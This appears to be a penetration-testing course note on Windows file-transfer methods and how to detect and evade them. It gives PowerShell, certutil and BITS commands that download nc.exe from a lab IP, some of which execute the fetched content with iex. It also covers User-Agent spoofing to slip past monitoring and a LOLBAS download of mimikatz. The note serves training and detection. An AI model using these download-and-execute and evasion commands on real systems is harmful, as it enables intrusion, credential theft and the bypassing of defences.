File Transfer Detection & Evasion Techniques

Detection Methods

1. Command Line Detection

  • Methodology: Implement whitelisting over blacklisting

  • Key Point: Whitelisting is more time-consuming but provides better security

  • Best Practice: Focus on detecting unusual command-line patterns

2. HTTP Protocol Analysis

  • Focus Area: User Agent String Detection

  • Implementation Steps:

    1. Create whitelist of legitimate user agents

    2. Include common system processes

    3. Document legitimate services (Windows Update, AV)

    4. Configure SIEM for user agent monitoring

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

# Download Command
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

# Detection Signature
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

2. WinHttpRequest

# Download Command
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.ResponseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

3. Msxml2.XMLHTTP

# Download Command
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.responseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

4. Certutil

# Download Commands
certutil -urlcache -split -f http://10.10.10.32/nc.exe
certutil -verifyctl -split -f http://10.10.10.32/nc.exe

# Detection Signature
User-Agent: Microsoft-CryptoAPI/10.0

5. BITS Transfer

# Download Command
Import-Module bitstransfer
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t
$r=gc $env:temp\t
rm $env:temp\t
iex $r

# Detection Signature
User-Agent: Microsoft BITS/7.8

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Common User Agent Strings

  • Internet Explorer:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

  • Firefox:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

  • Chrome:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6

  • Opera:

Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

  • Safari:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16

Custom User Agent Implementation

# Set Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

2. LOLBAS (Living Off The Land Binaries)

  • Purpose: Bypass application whitelisting

  • Example Using GfxDownloadWrapper.exe:

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Detection & Defense Methodology Checklist

Immediate Actions

Regular Monitoring

Investigation Steps

  1. Identify suspicious user agents

  2. Analyze transfer patterns

  3. Cross-reference with whitelist

  4. Document new threat patterns

Additional Resources

PreviousAdvanced File Transfer TechniquesNextShells & Payloads: Shell Overview